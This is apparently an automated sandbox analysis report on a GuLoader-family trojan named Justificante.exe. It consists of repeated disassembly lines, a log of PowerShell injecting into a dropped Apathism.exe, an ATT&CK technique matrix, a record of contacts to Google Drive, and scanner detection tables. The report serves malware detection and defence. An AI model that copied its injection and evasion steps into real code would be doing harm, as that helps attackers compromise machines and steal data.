      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2235A470 mov eax, dword ptr fs:[00000030h]7_2_2235A470
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2235A470 mov eax, dword ptr fs:[00000030h]7_2_2235A470
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2235A470 mov eax, dword ptr fs:[00000030h]7_2_2235A470
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223BC460 mov ecx, dword ptr fs:[00000030h]7_2_223BC460
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223EA456 mov eax, dword ptr fs:[00000030h]7_2_223EA456
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2235245A mov eax, dword ptr fs:[00000030h]7_2_2235245A
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236E443 mov eax, dword ptr fs:[00000030h]7_2_2236E443
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236E443 mov eax, dword ptr fs:[00000030h]7_2_2236E443
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236E443 mov eax, dword ptr fs:[00000030h]7_2_2236E443
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236E443 mov eax, dword ptr fs:[00000030h]7_2_2236E443
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236E443 mov eax, dword ptr fs:[00000030h]7_2_2236E443
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236E443 mov eax, dword ptr fs:[00000030h]7_2_2236E443
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236E443 mov eax, dword ptr fs:[00000030h]7_2_2236E443
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236E443 mov eax, dword ptr fs:[00000030h]7_2_2236E443
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223644B0 mov ecx, dword ptr fs:[00000030h]7_2_223644B0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223BA4B0 mov eax, dword ptr fs:[00000030h]7_2_223BA4B0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223364AB mov eax, dword ptr fs:[00000030h]7_2_223364AB
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223EA49A mov eax, dword ptr fs:[00000030h]7_2_223EA49A
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223304E5 mov ecx, dword ptr fs:[00000030h]7_2_223304E5
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22340535 mov eax, dword ptr fs:[00000030h]7_2_22340535
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22340535 mov eax, dword ptr fs:[00000030h]7_2_22340535
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22340535 mov eax, dword ptr fs:[00000030h]7_2_22340535
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22340535 mov eax, dword ptr fs:[00000030h]7_2_22340535
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22340535 mov eax, dword ptr fs:[00000030h]7_2_22340535
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22340535 mov eax, dword ptr fs:[00000030h]7_2_22340535
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2235E53E mov eax, dword ptr fs:[00000030h]7_2_2235E53E
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2235E53E mov eax, dword ptr fs:[00000030h]7_2_2235E53E
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2235E53E mov eax, dword ptr fs:[00000030h]7_2_2235E53E
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2235E53E mov eax, dword ptr fs:[00000030h]7_2_2235E53E
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2235E53E mov eax, dword ptr fs:[00000030h]7_2_2235E53E
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223C6500 mov eax, dword ptr fs:[00000030h]7_2_223C6500
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22404500 mov eax, dword ptr fs:[00000030h]7_2_22404500
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22404500 mov eax, dword ptr fs:[00000030h]7_2_22404500
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22404500 mov eax, dword ptr fs:[00000030h]7_2_22404500
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22404500 mov eax, dword ptr fs:[00000030h]7_2_22404500
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22404500 mov eax, dword ptr fs:[00000030h]7_2_22404500
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22404500 mov eax, dword ptr fs:[00000030h]7_2_22404500
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22404500 mov eax, dword ptr fs:[00000030h]7_2_22404500
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236656A mov eax, dword ptr fs:[00000030h]7_2_2236656A
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236656A mov eax, dword ptr fs:[00000030h]7_2_2236656A
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236656A mov eax, dword ptr fs:[00000030h]7_2_2236656A
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22338550 mov eax, dword ptr fs:[00000030h]7_2_22338550
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22338550 mov eax, dword ptr fs:[00000030h]7_2_22338550
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223545B1 mov eax, dword ptr fs:[00000030h]7_2_223545B1
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223545B1 mov eax, dword ptr fs:[00000030h]7_2_223545B1
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223B05A7 mov eax, dword ptr fs:[00000030h]7_2_223B05A7
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223B05A7 mov eax, dword ptr fs:[00000030h]7_2_223B05A7
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223B05A7 mov eax, dword ptr fs:[00000030h]7_2_223B05A7
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236E59C mov eax, dword ptr fs:[00000030h]7_2_2236E59C
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22332582 mov eax, dword ptr fs:[00000030h]7_2_22332582
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22332582 mov ecx, dword ptr fs:[00000030h]7_2_22332582
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22364588 mov eax, dword ptr fs:[00000030h]7_2_22364588
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2235E5E7 mov eax, dword ptr fs:[00000030h]7_2_2235E5E7
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2235E5E7 mov eax, dword ptr fs:[00000030h]7_2_2235E5E7
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2235E5E7 mov eax, dword ptr fs:[00000030h]7_2_2235E5E7
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2235E5E7 mov eax, dword ptr fs:[00000030h]7_2_2235E5E7
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2235E5E7 mov eax, dword ptr fs:[00000030h]7_2_2235E5E7
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2235E5E7 mov eax, dword ptr fs:[00000030h]7_2_2235E5E7
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2235E5E7 mov eax, dword ptr fs:[00000030h]7_2_2235E5E7
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2235E5E7 mov eax, dword ptr fs:[00000030h]7_2_2235E5E7
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223325E0 mov eax, dword ptr fs:[00000030h]7_2_223325E0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236C5ED mov eax, dword ptr fs:[00000030h]7_2_2236C5ED
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236C5ED mov eax, dword ptr fs:[00000030h]7_2_2236C5ED
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223365D0 mov eax, dword ptr fs:[00000030h]7_2_223365D0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236A5D0 mov eax, dword ptr fs:[00000030h]7_2_2236A5D0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236A5D0 mov eax, dword ptr fs:[00000030h]7_2_2236A5D0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236E5CF mov eax, dword ptr fs:[00000030h]7_2_2236E5CF
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236E5CF mov eax, dword ptr fs:[00000030h]7_2_2236E5CF
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22354A35 mov eax, dword ptr fs:[00000030h]7_2_22354A35
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22354A35 mov eax, dword ptr fs:[00000030h]7_2_22354A35
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236CA38 mov eax, dword ptr fs:[00000030h]7_2_2236CA38
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236CA24 mov eax, dword ptr fs:[00000030h]7_2_2236CA24
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2235EA2E mov eax, dword ptr fs:[00000030h]7_2_2235EA2E
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223BCA11 mov eax, dword ptr fs:[00000030h]7_2_223BCA11
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223ACA72 mov eax, dword ptr fs:[00000030h]7_2_223ACA72
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223ACA72 mov eax, dword ptr fs:[00000030h]7_2_223ACA72
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236CA6F mov eax, dword ptr fs:[00000030h]7_2_2236CA6F
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236CA6F mov eax, dword ptr fs:[00000030h]7_2_2236CA6F
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236CA6F mov eax, dword ptr fs:[00000030h]7_2_2236CA6F
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223DEA60 mov eax, dword ptr fs:[00000030h]7_2_223DEA60
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22336A50 mov eax, dword ptr fs:[00000030h]7_2_22336A50
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22336A50 mov eax, dword ptr fs:[00000030h]7_2_22336A50
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22336A50 mov eax, dword ptr fs:[00000030h]7_2_22336A50
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22336A50 mov eax, dword ptr fs:[00000030h]7_2_22336A50
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22336A50 mov eax, dword ptr fs:[00000030h]7_2_22336A50
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22336A50 mov eax, dword ptr fs:[00000030h]7_2_22336A50
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22336A50 mov eax, dword ptr fs:[00000030h]7_2_22336A50
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22340A5B mov eax, dword ptr fs:[00000030h]7_2_22340A5B
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22340A5B mov eax, dword ptr fs:[00000030h]7_2_22340A5B
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22338AA0 mov eax, dword ptr fs:[00000030h]7_2_22338AA0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22338AA0 mov eax, dword ptr fs:[00000030h]7_2_22338AA0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22386AA4 mov eax, dword ptr fs:[00000030h]7_2_22386AA4
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22368A90 mov edx, dword ptr fs:[00000030h]7_2_22368A90
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2233EA80 mov eax, dword ptr fs:[00000030h]7_2_2233EA80
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2233EA80 mov eax, dword ptr fs:[00000030h]7_2_2233EA80
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2233EA80 mov eax, dword ptr fs:[00000030h]7_2_2233EA80
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2233EA80 mov eax, dword ptr fs:[00000030h]7_2_2233EA80
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2233EA80 mov eax, dword ptr fs:[00000030h]7_2_2233EA80
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2233EA80 mov eax, dword ptr fs:[00000030h]7_2_2233EA80
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2233EA80 mov eax, dword ptr fs:[00000030h]7_2_2233EA80
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2233EA80 mov eax, dword ptr fs:[00000030h]7_2_2233EA80
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2233EA80 mov eax, dword ptr fs:[00000030h]7_2_2233EA80
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22404A80 mov eax, dword ptr fs:[00000030h]7_2_22404A80
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236AAEE mov eax, dword ptr fs:[00000030h]7_2_2236AAEE
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236AAEE mov eax, dword ptr fs:[00000030h]7_2_2236AAEE
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22330AD0 mov eax, dword ptr fs:[00000030h]7_2_22330AD0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22364AD0 mov eax, dword ptr fs:[00000030h]7_2_22364AD0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22364AD0 mov eax, dword ptr fs:[00000030h]7_2_22364AD0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22386ACC mov eax, dword ptr fs:[00000030h]7_2_22386ACC
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22386ACC mov eax, dword ptr fs:[00000030h]7_2_22386ACC
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22386ACC mov eax, dword ptr fs:[00000030h]7_2_22386ACC
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2235EB20 mov eax, dword ptr fs:[00000030h]7_2_2235EB20
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2235EB20 mov eax, dword ptr fs:[00000030h]7_2_2235EB20
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223F8B28 mov eax, dword ptr fs:[00000030h]7_2_223F8B28
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223F8B28 mov eax, dword ptr fs:[00000030h]7_2_223F8B28
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223AEB1D mov eax, dword ptr fs:[00000030h]7_2_223AEB1D
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223AEB1D mov eax, dword ptr fs:[00000030h]7_2_223AEB1D
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223AEB1D mov eax, dword ptr fs:[00000030h]7_2_223AEB1D
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223AEB1D mov eax, dword ptr fs:[00000030h]7_2_223AEB1D
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223AEB1D mov eax, dword ptr fs:[00000030h]7_2_223AEB1D
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223AEB1D mov eax, dword ptr fs:[00000030h]7_2_223AEB1D
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug

      HIPS / PFW / Operating System Protection Evasion

      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created / APC Queued / Resumed: C:\Users\user\AppData\Local\Temp\Apathism.exe
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread APC queued: target process: C:\Users\user\AppData\Local\Temp\Apathism.exe
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section unmapped: C:\Users\user\AppData\Local\Temp\Apathism.exe base address: 400000
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Users\user\AppData\Local\Temp\Apathism.exe base: 1660000
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\Apathism.exe "C:\Users\user\AppData\Local\Temp\Apathism.exe"
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
      Source: C:\Users\user\Desktop\Justificante.exe Code function: 0_2_004035D8 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess

      Stealing of Sensitive Information

      Source: Yara match File source: 00000007.00000002.2616112535.0000000021F90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

      Remote Access Functionality

      Source: Yara match File source: 00000007.00000002.2616112535.0000000021F90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
      Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 Access Token Manipulation | 11 Masquerading | OS Credential Dumping | 1 Query Registry | Remote Services | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
      Credentials | Domains | Default Accounts | 1 Shared Modules | Boot or Logon Initialization Scripts | 411 Process Injection | 131 Virtualization/Sandbox Evasion | LSASS Memory | 321 Security Software Discovery | Remote Desktop Protocol | 1 Clipboard Data | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
      Email Addresses | DNS Server | Domain Accounts | 2 PowerShell | Logon Script (Windows) | 1 DLL Side-Loading | 1 Access Token Manipulation | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
      Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 411 Process Injection | NTDS | 131 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | 13 Application Layer Protocol | Traffic Duplication | Data Destruction
      Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
      Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 2 Obfuscated Files or Information | Cached Domain Credentials | 2 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
      DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Software Packing | DCSync | 114 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
      Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
      [Behavior graph (image not reproduced): Behavior Graph ID: 1539381, Sample: Justificante.exe, Startdate: 22/10/2024, Architecture: WINDOWS, Score: 100. Justificante.exe started powershell.exe; powershell.exe dropped C:\Users\user\AppData\Local\...\Apathism.exe (PE32) and started Apathism.exe and conhost.exe; Apathism.exe contacted drive.google.com (142.250.184.238, port 443) and drive.usercontent.google.com (142.250.186.97, port 443).]

      Source | Detection | Scanner | Label | Link
      Justificante.exe | 39% | ReversingLabs | Win32.Trojan.Guloader |
      Justificante.exe | 100% | Avira | TR/Agent.lfkxa |

      Source | Detection | Scanner | Label | Link
      C:\Users\user\AppData\Local\Temp\Apathism.exe | 100% | Avira | TR/Agent.lfkxa |
      C:\Users\user\AppData\Local\Temp\Apathism.exe | 39% | ReversingLabs | Win32.Trojan.Guloader |

      No Antivirus matches
      No Antivirus matches

      Source | Detection | Scanner | Label | Link
      http://nuget.org/NuGet.exe | 0% | URL Reputation | safe |
      http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
      https://aka.ms/pscore6lB | 0% | URL Reputation | safe |
      https://contoso.com/ | 0% | URL Reputation | safe |
      https://nuget.org/nuget.exe | 0% | URL Reputation | safe |
      https://contoso.com/License | 0% | URL Reputation | safe |
      https://contoso.com/Icon | 0% | URL Reputation | safe |
      https://apis.google.com | 0% | URL Reputation | safe |
      http://nsis.sf.net/NSIS_ErrorError | 0% | URL Reputation | safe |
      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |

      Name | IP | Active | Malicious | Antivirus Detection | Reputation
      drive.google.com | 142.250.184.238 | true | false | | unknown
      drive.usercontent.google.com | 142.250.186.97 | true | false | | unknown

      Name | Source | Malicious | Antivirus Detection | Reputation
      https://www.google.com | Apathism.exe, 00000007.00000003.2232712170.00000000066B5000.00000004.00000020.00020000.00000000.sdmp, Apathism.exe, 00000007.00000003.2232712170.00000000066A6000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
      http://nuget.org/NuGet.exe | powershell.exe, 00000002.00000002.2144649951.0000000005684000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
      http://pesterbdd.com/images/Pester.png | powershell.exe, 00000002.00000002.2141259582.0000000004777000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
      https://aka.ms/pscore6lB | powershell.exe, 00000002.00000002.2141259582.0000000004621000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
      http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000002.00000002.2141259582.0000000004777000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
      https://drive.google.com/ | Apathism.exe, 00000007.00000002.2600537103.0000000006648000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
      https://contoso.com/ | powershell.exe, 00000002.00000002.2144649951.0000000005684000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
      https://nuget.org/nuget.exe | powershell.exe, 00000002.00000002.2144649951.0000000005684000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
      https://contoso.com/License | powershell.exe, 00000002.00000002.2144649951.0000000005684000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
